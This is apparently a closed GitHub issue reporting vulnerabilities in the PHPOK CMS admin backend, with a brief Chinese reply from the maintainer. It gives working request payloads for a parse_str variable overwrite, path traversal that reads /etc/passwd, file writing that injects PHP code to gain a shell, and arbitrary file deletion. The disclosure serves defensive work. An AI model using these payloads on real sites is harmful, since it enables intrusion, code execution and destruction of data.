Closed Passer6y closed 5 years ago
from the Entrance of framework,i discovered parse_str variable overwrite in framework/init.php
parse_str
framework/init.php
we could watch $query_string parameter in framework/libs/server.php :
$query_string
framework/libs/server.php
payload:http://phpok/?data[script]=passer6y
http://phpok/?data[script]=passer6y
back to the: framework/admin/tpl_control.php
framework/admin/appsys_control.php
there is two file have this vulnerability: payload1:
/admin.php?c=appsys&f=file_edit&id=fav&title=../../../../../../../etc/passwd
payload2:
/admin.php?c=tpl&f=edit&id=1&title=../../../../../../../etc/passwd
edit_save_f() function In framework/admin/tpl_control.php 383 line
edit_save_f()
framework/admin/tpl_control.php
payload:/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
framework/admin/tpl_control.php 303行 delfile_f()函数:
delfile_f()
payload:/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php
感谢您如此仔细的测评! 这里我们先说明一下,后台针对已经登录的管理员(目前是系统管理员)是有最高权限的! 回头我们会针对普通管理员进行一定的限制,感谢您的支持
Variable Overwrite Vulnerability
from the Entrance of framework,i discovered
parse_str
variable overwrite inframework/init.php
we could watch
$query_string
parameter inframework/libs/server.php
:payload:
http://phpok/?data[script]=passer6y
Vulnerability to read arbitrary files
back to the: framework/admin/tpl_control.php
framework/admin/appsys_control.php
there is two file have this vulnerability: payload1:
payload2:
Arbitrary File Writing to getshell
edit_save_f()
function Inframework/admin/tpl_control.php
383 linepayload:
/admin.php?c=tpl&f=edit_save&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php&content=<%3fphp+phpinfo()%3becho+"passer6y"%3b%3f
Arbitrary file delete Vulnerability
framework/admin/tpl_control.php 303行
delfile_f()
函数:payload:
/admin.php?c=tpl&f=delfile&id=1&title=../../../../../../../Users/passer6y/Documents/www/phpok/version.php